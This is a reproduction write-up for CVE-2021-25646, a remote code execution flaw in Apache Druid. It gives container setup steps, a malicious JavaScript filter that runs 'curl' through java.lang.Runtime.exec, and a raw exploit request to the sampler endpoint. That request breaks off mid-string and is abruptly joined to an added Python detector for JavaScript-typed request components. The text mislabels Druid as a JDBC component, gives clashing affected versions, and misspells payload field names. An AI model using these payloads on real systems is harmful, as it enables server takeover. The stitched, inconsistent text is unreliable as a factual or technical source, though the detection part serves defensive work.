
Title: CVE-2021-25646 - Apache Druid RCE Reappearance

Apache Druid RCE Reproduction

1 Vulnerability overview

1.1 Druid

Druid is a JDBC component that supports all JDBC-compatible databases, including Oracle, MySQL, Derby, PostgreSQL, SQL Server, H2, etc.

1.2 Vulnerability description

ID: CVE-2021-25646. Apache Druid includes code that executes user-provided JavaScript functions embedded in various types of requests. This functionality is intended for high-trust environments and is disabled by default. However, in Druid 0.20.0 and lower, an authenticated user can craft the incoming JSON to control some sensitive parameters, send a malicious request, and use this Apache Druid vulnerability to execute arbitrary code.

1.3 Affected versions

Apache Druid 0.20.1

2 Reproduction

2.1 Environment setup

Pull the 0.16.0 image from the Docker repository and start it:

docker pull fokkodriesprong/docker-druid
docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

[screenshot]

2.2 Reproduction steps

After the docker container is started, access port 8888:

[screenshot]

Click Load data - Local Disk:

[screenshot]

Fill in:

Base directory: quickstart/tutorial/
File filter: wikiticker-2015-09-12-sampled.json.gz

Click Next until you reach the Filter step:

[screenshot]

Modify the filter to:

{
  "type": "javascript",
  "function": "function(value){return java.lang.Runtime.getRuntime().exec('curl dnslog')}",
  "dimensional": "added",
  "": {
    "enabled": "true"
  }
}

[screenshots]

You can also send the PoC request directly:

POST /druid/indexer/v1/sampler HTTP/1.1
Host: xxx.xxx.xxx.xxx:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 995
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesian omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":true,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionalsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimensionality": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('curl
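From the defender's side, the description in 1.2 and the PoC above share one observable: every JavaScript feature in Druid (filters, aggregators, extraction functions, parsers, post-aggregators) is expressed as a JSON object with "type": "javascript", and a request to the sampler or indexer that carries one is worth alerting on, because that feature is supposed to be off. The following is an added detection example, not code from the post or from the Druid project. It walks a request body recursively, reports every JavaScript-typed object with its JSON path, raises severity when the function body reaches into the JVM (java.lang.Runtime or ProcessBuilder), and checks whether druid.javascript.enabled (a real Druid property, default false) has been switched on in a runtime properties file. The sample request bodies are constructed for this example and use a placeholder command; the JSON field names in them are my own choice and are not taken from the PoC. Because the vulnerable versions ran the script regardless of that property, the config check is hygiene; inspecting request bodies (in a WAF, reverse proxy, or request log scan) and running a fixed version are the actual mitigations.

```python
"""Detect JavaScript-typed components in Apache Druid request bodies.

Added example (not part of the original post, not Druid's own code).
Sample bodies below are constructed for this example.
"""
import json
import re
from typing import Any, Iterator

# Tokens inside a JavaScript function body that reach from the script engine
# into the JVM; their presence turns a finding from medium into high severity.
JVM_ESCAPE_RE = re.compile(r"java\.lang\.(Runtime|ProcessBuilder)|Packages\.java")


def walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json_path, node) for every node of a parsed JSON document."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from walk(value, f"{path}[{i}]")


def find_javascript_components(spec: dict) -> list[dict]:
    """One finding per object whose "type" is "javascript" (case-insensitive)."""
    findings = []
    for path, node in walk(spec):
        if not isinstance(node, dict):
            continue
        if str(node.get("type", "")).lower() != "javascript":
            continue
        body = str(node.get("function", ""))
        severity = "high" if JVM_ESCAPE_RE.search(body) else "medium"
        findings.append({"path": path, "severity": severity, "function": body[:120]})
    return findings


def scan_request_body(raw_body: str) -> list[dict]:
    """Scan a raw HTTP body; non-JSON or non-object bodies are not Druid specs."""
    try:
        spec = json.loads(raw_body)
    except json.JSONDecodeError:
        return []
    if not isinstance(spec, dict):
        return []
    return find_javascript_components(spec)


def javascript_enabled(runtime_properties: str) -> bool:
    """True only if an uncommented druid.javascript.enabled=true line is present.

    The property defaults to false when absent (Druid configuration reference).
    """
    for line in runtime_properties.splitlines():
        line = line.strip()
        if line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "druid.javascript.enabled":
            return value.strip().lower() == "true"
    return False


# Constructed sampler body shaped like the PoC, with a placeholder command.
SUSPICIOUS_BODY = json.dumps({
    "type": "index",
    "spec": {
        "ioConfig": {"type": "index",
                     "inputSource": {"type": "inline", "data": "{\"added\":1}"},
                     "inputFormat": {"type": "json"}},
        "dataSchema": {
            "dataSource": "sample",
            "timestampSpec": {"column": "timestamp", "format": "iso"},
            "transformSpec": {
                "transforms": [],
                "filter": {"type": "javascript",
                           "function": "function(value){return java.lang.Runtime"
                                       ".getRuntime().exec('PLACEHOLDER_COMMAND')}"},
            },
        },
    },
})

# Constructed body whose JavaScript filter stays inside the script engine:
# still a finding (the feature should be off), but medium severity.
PLAIN_JS_BODY = json.dumps(
    {"filter": {"type": "javascript", "function": "function(value){return value > 0}"}})

# Constructed body with no JavaScript components at all.
CLEAN_BODY = json.dumps({"filter": {"type": "selector", "value": "1"}})


if __name__ == "__main__":
    for name, body in [("suspicious", SUSPICIOUS_BODY), ("plain_js", PLAIN_JS_BODY),
                       ("clean", CLEAN_BODY)]:
        print(name, scan_request_body(body))
    print("javascript enabled:", javascript_enabled("druid.javascript.enabled=true\n"))
```

The path reported for the PoC-shaped body is $.spec.dataSchema.transformSpec.filter, which is what an analyst wants to see in an alert; the same walker catches JavaScript aggregators or extraction functions placed anywhere else in a spec, since it keys on the object's "type" rather than on a fixed location.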
